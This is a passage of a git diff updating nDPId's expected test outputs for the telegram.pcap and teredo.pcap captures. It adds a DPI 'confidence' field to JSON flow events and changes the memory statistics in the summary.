+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779598465,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779648840,"flow_last_seen":1588779654853,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651686,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":298,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":54896,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651659,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":288,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":57312,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1588779637543,"flow_last_seen":1588779651680,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1744,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651645,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588779603292,"flow_last_seen":1588779643386,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779645381,"flow_last_seen":1588779647380,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.ntop","breed":"Safe","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779645381,"flow_last_seen":1588779647380,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}}
 00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":301,"flow_first_seen":1588779617174,"flow_last_seen":1588779629315,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":59552,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.52","src_port":23174,"dst_port":31480,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634762,"flow_last_seen":1588779634795,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655298,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634762,"flow_last_seen":1588779634795,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655298,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","total-events-serialized":278}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1566/1566
@@ -284,9 +284,9 @@
 ~~ total active/idle flows...: 48/48
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4696739 bytes
-~~ total memory freed........: 4696739 bytes
-~~ total allocations/frees...: 101262/101262
+~~ total memory allocated....: 4766276 bytes
+~~ total memory freed........: 4766276 bytes
+~~ total allocations/frees...: 102852/102852
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 2271 chars
diff --git a/test/results/teredo.pcap.out b/test/results/teredo.pcap.out
index 92fb6a659..8aee40aec 100644
--- a/test/results/teredo.pcap.out
+++ b/test/results/teredo.pcap.out
@@ -1,31 +1,31 @@
 00438{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"teredo.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853615305,"flow_last_seen":1438853615305,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853615305,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1438853615305,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1438853615305,"pkt":"bEFqjICJABsXAAEVCABFAABZWboAAH4R6SsKcBBqwogcTM0hDdgARX2HAAEAALEbP+pGqa\/pAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853615305,"flow_last_seen":1438853615305,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853615305,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","ndpi": {"proto":"Teredo","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853615305,"flow_last_seen":1438853615305,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853615305,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}}
 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1438853615358,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"ts_msec":1438853615358,"pkt":"ABsXAAEVbEFqjICJCABFAACJMb4AAHIRHPjCiBxMCnAQag3YzSEAdV9uAAEAALEbP+pGqa\/pAAAAMt5G+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYAZJ0AAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEz\/AAAAACABAA=="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853619792,"flow_last_seen":1438853619792,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853619792,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1438853619792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1438853619792,"pkt":"bEFqjICJABsXAAEVCABFAABZKFgAAH4RGp8KcBBZwogcTOvdDdgARWZ6AAEAAJXRHBBSCtwOAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853619792,"flow_last_seen":1438853619792,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853619792,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","ndpi": {"proto":"Teredo","breed":"Acceptable","category":"Network"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853619792,"flow_last_seen":1438853619792,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853619792,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}}
 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1438853619844,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"ts_msec":1438853619844,"pkt":"ABsXAAEVbEFqjICJCABFAACJMcAAAHIRHQfCiBxMCnAQWQ3Y690AdQSAAAEAAJXRHBBSCtwOAAAAFCJG+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYAZJ0AAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEz\/AAAAACABAA=="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853629357,"flow_last_seen":1438853629357,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853629357,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1438853629357,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1438853629357,"pkt":"bEFqjICJABsXAAEVCABFAABZf5wAAH4Rw1cKcBBcwogcTPfYDdgAReM8AAEAAPs1qOhE924kAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853629357,"flow_last_seen":1438853629357,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853629357,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","ndpi": {"proto":"Teredo","breed":"Acceptable","category":"Network"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853629357,"flow_last_seen":1438853629357,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853629357,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}}
 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1438853629411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"ts_msec":1438853629411,"pkt":"ABsXAAEVbEFqjICJCABFAACJMcEAAHIRHQPCiBxMCnAQXA3Y99gAdXxOAAEAAPs1qOhE924kAAAACCdG+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYAZL4AAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEwAAAAAAAAAAA=="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853632713,"flow_last_seen":1438853632713,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853632713,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1438853632713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1438853632713,"pkt":"bEFqjICJABsXAAEVCABFAABZcmgAAH4R0KcKcBBAwogcTNtaDdgARUt\/AAEAABh7537NjT4KAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853632713,"flow_last_seen":1438853632713,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853632713,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","ndpi": {"proto":"Teredo","breed":"Acceptable","category":"Network"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853632713,"flow_last_seen":1438853632713,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1438853632713,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}}
